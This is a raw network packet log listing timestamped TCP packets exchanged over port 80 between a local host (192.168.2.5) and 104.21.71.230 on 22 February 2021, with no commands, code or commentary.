                                                                                                                                                                Feb 22, 2021 07:46:12.582562923 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.582575083 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.582580090 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.582613945 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.583437920 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.583463907 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.583481073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.583499908 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.583501101 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.583518982 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.583525896 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.583534956 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.583568096 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.584388018 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.584414959 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.584433079 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.584450960 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.584466934 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.584470987 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.584482908 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.584517002 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.585321903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.585347891 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.585366011 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.585403919 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.585403919 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.585426092 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.585448980 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.585452080 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.585474014 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.586272955 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.586298943 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.586314917 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.586333036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.586348057 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.586368084 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.586390018 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.586446047 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.892576933 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892613888 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892627001 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892641068 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892658949 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892674923 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892749071 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.892803907 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.892898083 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892919064 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892937899 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892952919 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892972946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.892992020 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.893012047 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.893047094 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.893882990 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.893913984 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.893928051 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.893944979 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.893961906 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.893979073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.894001961 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.894028902 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.895948887 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.895981073 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.895993948 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896009922 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896028996 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896042109 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896059036 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896079063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896097898 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896115065 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896119118 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.896132946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896145105 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.896151066 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896166086 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.896208048 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.896706104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896727085 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896743059 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896763086 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896780968 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896794081 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.896795988 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.896828890 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.896847963 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.897896051 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.897921085 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.897934914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.897953987 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.897968054 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.897979975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.897991896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898010015 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898030996 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.898083925 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.898840904 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898866892 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898885012 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898900986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898916960 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898932934 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.898940086 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.898983955 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.899807930 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.899872065 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.899888992 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.899905920 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.899921894 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.899926901 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.899944067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.899961948 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.899995089 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.900751114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.900774956 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.900793076 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.900810957 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.900845051 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.900846004 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.900861979 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.900887012 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.900923967 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.901665926 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901715040 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901735067 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901750088 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901766062 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.901772022 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901791096 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901798964 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.901807070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.901834011 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.902698994 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.902726889 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.902743101 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.902759075 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.902775049 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.902790070 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.902790070 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.902826071 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.903650999 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.903676987 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.903696060 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.903712034 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.903717041 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.903729916 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.903747082 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.903748989 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.903778076 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.904589891 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.904613018 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.904629946 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.904647112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.904659033 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.904671907 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.904711008 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.905293941 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.905313969 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.905330896 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.905350924 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.905364037 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.905369043 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.905399084 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.905402899 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.905446053 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.906214952 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.906239033 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.906256914 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.906270981 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.906289101 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.906305075 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.906307936 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.906353951 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.907187939 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.907211065 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.907227039 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.907243967 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.907258987 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.907263041 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.907284021 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.907318115 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.907356024 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.908063889 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.908087969 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.908104897 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.908122063 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.908138990 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.908148050 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.908155918 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.908175945 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.908201933 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.909019947 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909043074 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909059048 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909075975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909092903 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909095049 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.909111977 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909121037 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.909146070 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.909934044 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909956932 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909975052 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.909993887 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910007954 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.910012960 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910029888 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910043001 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.910075903 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.910892010 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910914898 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910931110 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910948038 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910964012 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.910979033 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911056042 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.911070108 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.911844969 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911868095 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911885023 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911900997 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911911011 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.911917925 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911935091 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.911947966 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.911978006 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.912830114 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.912852049 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.912909031 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.912998915 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913016081 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913034916 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913053989 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913065910 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.913089991 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.913799047 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913820982 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913836956 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913856030 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913873911 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913889885 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.913899899 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.913933992 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.914669037 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.914690971 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.914707899 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.914724112 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.914740086 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.914753914 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.914757013 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915630102 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915652037 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915669918 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915676117 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.915684938 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.915688038 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915704966 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915710926 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.915720940 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.915766001 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.916626930 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.916651011 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.916667938 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.916685104 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.916704893 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.916723013 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.916739941 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.916783094 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.917511940 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.917536974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.917553902 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.917572975 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.917592049 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.917601109 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.917608976 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.917639017 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.917664051 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.918467045 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.918493986 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.918519020 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.918531895 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.918549061 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.918565035 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.918598890 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.918643951 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.919405937 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.919435024 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.919452906 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.919470072 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.919487000 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.919502974 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.919506073 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.919559002 CET4972680192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:46:12.920339108 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.920361996 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.920382977 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.920402050 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.920418024 CET8049726104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:46:12.920432091 CET8049726104.21.71.230192.168.2.5
